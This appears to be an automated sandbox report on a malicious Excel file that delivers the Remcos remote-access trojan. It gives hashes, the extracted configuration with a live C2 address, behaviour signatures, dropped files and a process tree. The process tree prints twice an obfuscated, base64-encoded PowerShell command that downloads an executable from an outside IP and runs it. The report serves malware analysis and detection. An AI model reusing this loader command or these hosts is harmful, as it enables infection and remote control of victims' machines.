Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-12-2024 03:28

General

  • Target

    7fb0d13c333aef86316da1494da234eade3b8db44fddd27affc38bae40614744.xls

  • Size

    1.1MB

  • MD5

    df946e734bca37e4eaf06978a0b95ef1

  • SHA1

    c06f8ddc7d5cb1030c516286bd0a660502cbbe35

  • SHA256

    7fb0d13c333aef86316da1494da234eade3b8db44fddd27affc38bae40614744

  • SHA512

    e9dd9266c4dc5721b47d1d4de0e1525482cbec8330e5003f0444d940c99380efae89f7424d709e7aac4962e2541d84b06c1fb7d4686e0949a852e83b39d5dc96

  • SSDEEP

    12288:qymzHJEUiOIBUzMTSgD3DERnLRmF8DrEPTxpsAQx1Zj+j+EPebSA5YiA76UdKX/E:4BaRbARM8+D8Z+jJC50YrNPkly4h

Malware Config

Extracted

Family

remcos

Botnet

elvis

C2

107.173.4.16:2560

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-GJDISH

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Detected phishing page

    Hiding page source

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\7fb0d13c333aef86316da1494da234eade3b8db44fddd27affc38bae40614744.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1032
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2232
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ia23_bzz.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2024
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA20A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA209.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2292
        • C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe
          "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
          4⤵
          • Executes dropped EXE
          PID:2876

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

    Filesize

    2KB

    MD5

    bf784edee93fca58a4f656c76f07c1b4

    SHA1

    4965c03faaeec20f1b0cefa4844608e403d2569c

    SHA256

    82e0e5014ce5a84bb7fd5e2569c66912fbf4b6262c7f0e94f9a7085ff044188f

    SHA512

    3c480e5ddde056f5b250f66018b78158ecb265f7843416720fbf6dd8038ec2e3d4eca5655c85659d1e7fe5d887cc93e112861beb3aa2524a1d4f9fb2725e6475

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\87063374136EEC47E933C8519BBDFF7F

    Filesize

    471B

    MD5

    90c52d81ab9066022771fa4424ea7e8f

    SHA1

    161e7b2f33071b4f2d52dab3e273e1b9edb55b0b

    SHA256

    a3e87172d27129cc41d87a9f38bab1912cd2d241b1934086678e1d88602c9284

    SHA512

    ec0a5f3a8a846383ddf29c57355516785de9a8c3dbcfad388c22e425298ab84617e45d994fa6946d89eeb6253916d9e8ece51cefced0542f23dc727917a2ff2f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

    Filesize

    1KB

    MD5

    9047d91427fbc84f6f261fa8961d626b

    SHA1

    a51383a0e9eccbe2032f19ff1d5c91e866cfb69f

    SHA256

    3181b9f6bf992319794a86f7f27631619c7fcae1e208f4ced04e64b7ea577a19

    SHA512

    dc21fb378f8ef75fab3c7e80bf1fb7deb2364631a939d1ed113199be83e4a18113795b57620bdbf056876515293f79e8f50b3869b7ad175e073013b0616cba85

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

    Filesize

    488B

    MD5

    9a102f57abb800e451d5525dbadba0f0

    SHA1

    a594485deff7e028b0fc2010e0b26a299d496d94

    SHA256

    d82c7b67e22e38cd99a8c24e3a63f634276b9be6afa8177458257da8beaed4d7

    SHA512

    ee552bfbc4fee1398dee75552bc9253fc85b4d73227deccfdfec18a7c755f4b81868b185063b8268cba37b558f74f3d6aa483b8a0f52d5c74106c26e562c35f3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\87063374136EEC47E933C8519BBDFF7F

    Filesize

    480B

    MD5

    f66d462b1f0eba9434c204452f00038b

    SHA1

    6fbaa14008fd9518d782b07cd792b4ef4cf878c5

    SHA256

    14d6f9fa699291e7fb41c2d6e42dc7ad6582fd6674e3cbabe1b80f3b15f0d6a4

    SHA512

    da59c895812138a08085dc637cacece8fce4579ed636adc8b55a00758660bd1376a961df11d04cdd92155c5e26e7aeb085b0625bc6433d4d9ae87a4bcbdf9465

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    a223b24a59c5ca9f64f974a5c331189e

    SHA1

    84b82ecb57fdf561c4179ea73d549668e2a60294

    SHA256

    5b944224be85d86884891657260d01eecc2875c64b8e2f2e0292cac9b2fa585c

    SHA512

    342836d705eb3bd9ea71a9766abf1b3744a133b9e24f31832edba7f25419b0c2afdd2c570171bcc83aa961fab2ae324e334f97db3c08880a99ac332ee817ac7f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

    Filesize

    482B

    MD5

    fdb73c43388d7b6a2199d13ddb4384ea

    SHA1

    37de42a4daec11ddf1ad714db76bd26aa8b3649b

    SHA256

    2ac733c0775b516176ccae165b9ccca465cd691ee9df4fbcf60128253af8ac3c

    SHA512

    b59590770cd49d7b583d0d0d484477a0b8371c78d92d94158909a4eab1ec154848aa9fa110220ec965c3df5a6273de5590c7e2e4e70f432dace37e5cdbba3237

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\crreatedbestthingswithgreatattitudeneedforthat[1].hta

    Filesize

    8KB

    MD5

    e4c5ceeb8c98c1c23a0ff6cd1a4d36e4

    SHA1

    033d24c4375394ad9ede6a94cc80bca6b47a1ef7

    SHA256

    bea2fd609f237d38625a50f7bb5688e7dcfdeb39e5641bb881e257807761b902

    SHA512

    b152a9bcbef1fb5594f0a4f4c9d0e59ffa748a226cefbd967d65aed315d2230ad340d345077866f6d1682e892e5dab9a8b776a7152759db1c4834ab6678337a1

  • C:\Users\Admin\AppData\Local\Temp\Cab9070.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESA20A.tmp

    Filesize

    1KB

    MD5

    33caa5dec19b03ad7ceb12dc8eb87744

    SHA1

    e7d0615e470299c3ce49f1dd1f426a294be51ad5

    SHA256

    12931a8f3b5e74d60308bcb7bac864f31884abcc783fad3a16519b3ddd5e3a13

    SHA512

    d8a83a194773bd44bd3e6da5447994026aa5a83d2d1131c6e5e5e101689ad7bb80802e11d31a93ec47d8a3f50f8629fa001c6150290d7fb5cc2f07c4018dda07

  • C:\Users\Admin\AppData\Local\Temp\Tar9083.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\ia23_bzz.dll

    Filesize

    3KB

    MD5

    acc47de6986bb9adc04463a45e789052

    SHA1

    0d50dc7eb4d2f3d48aeafd730606d08d34c12003

    SHA256

    33d255402a9dcc52df69fd47a4cdfb4dedfed5919fca772a611eed62b2387d2f

    SHA512

    4f32c3fac344d16a7b3dec6651b320b302727420faac4ce7b7949167c0b9aca35a229ece61bad5f929d1197a9e9590a7a12ab3145866e0521a44e0237156e571

  • C:\Users\Admin\AppData\Local\Temp\ia23_bzz.pdb

    Filesize

    7KB

    MD5

    528ac1b3350942d32715e6d4d4f050c7

    SHA1

    810dc45eeeef626b07fe5750b9f2adad78ca11d3

    SHA256

    1bef68e2761ece9f030e5647d8227d3412b3f70e1309f98ecd6de9d34cf573bb

    SHA512

    ceadcedd195cd7c8657ea3692eeb4dc6147eadfa5b0a9f101c60fa3ba1f21f02e688e780ac6c47f8e5c448d93afd4cd65aa78a3b4c1cbceedce2a5170264f7ea

  • C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe

    Filesize

    530KB

    MD5

    c6b0fba610732719435d9621878bc605

    SHA1

    789afce0b2016029215db7cca0ce7c4acfa54b4c

    SHA256

    ce59b68d157e34b9608b9535441963aaef11068cae3b75a3646238f25b74b92d

    SHA512

    5d67d7e0fec12d7f03053d809f614263c6af7b3d54ed794632ee9024895b3c607ebcabd81a2d6202d280968c4df1ef9bd3699675416a67936345f8622c206933

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCA209.tmp

    Filesize

    652B

    MD5

    d995a02c30f8c1b7e3e622eee5480e9c

    SHA1

    bf0c1b61c7703142e4b0c440547d6065473702a7

    SHA256

    3be1a94455351132a0099d00c0faa0b4fd3ac030f3e9320ea79831e63f0fc9bd

    SHA512

    6cf72af19acfb1ced8a0d3ed7e204c4b3c41e9d8fa4b39593683240896706d16ed4860e34e11d822571fd073a8a3a8656bea0d14f0e85d26f1c0c537226b339d

  • \??\c:\Users\Admin\AppData\Local\Temp\ia23_bzz.0.cs

    Filesize

    478B

    MD5

    80c03b4485808d996cc8226157f377a7

    SHA1

    7cc7e02b84232b1523c555a349c86fc059a98eff

    SHA256

    240b4ca770e75d02c83cb17844897b66b8c671c1477654d797146a19e0bcf12d

    SHA512

    ee72fd6d3ec1d6a3645c59c72a7816bcf6cf34b04683a2611eedb1897d5781c7fb92bdb1d295671b2c107a2008100e8ab1010a7401bd6c651bfed2219f15656c

  • \??\c:\Users\Admin\AppData\Local\Temp\ia23_bzz.cmdline

    Filesize

    309B

    MD5

    407f5a837a168e0624012d07de086d40

    SHA1

    900cedfd506a5bed60a64d453f94cac3f7d5d9f2

    SHA256

    124eb0c363e57f77f66995d70930525109775db4fdffd296820b84b7fc384388

    SHA512

    00f1c7e370b8ea8a48744b71664b00c0825be1e2b4fb7f4a80781515f9e6032e1d2d57b067867fe94ae9fd16046990af2d28549931202a2271c389b7960fd127

  • memory/1032-1-0x000000007292D000-0x0000000072938000-memory.dmp

    Filesize

    44KB

  • memory/1032-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1032-61-0x0000000002400000-0x0000000002402000-memory.dmp

    Filesize

    8KB

  • memory/1032-98-0x000000007292D000-0x0000000072938000-memory.dmp

    Filesize

    44KB

  • memory/2876-117-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2876-123-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2876-115-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2876-116-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2876-126-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2876-118-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2876-119-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2876-120-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2876-121-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2876-122-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2876-114-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2876-124-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/2876-125-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/3044-60-0x0000000000B10000-0x0000000000B12000-memory.dmp

    Filesize

    8KB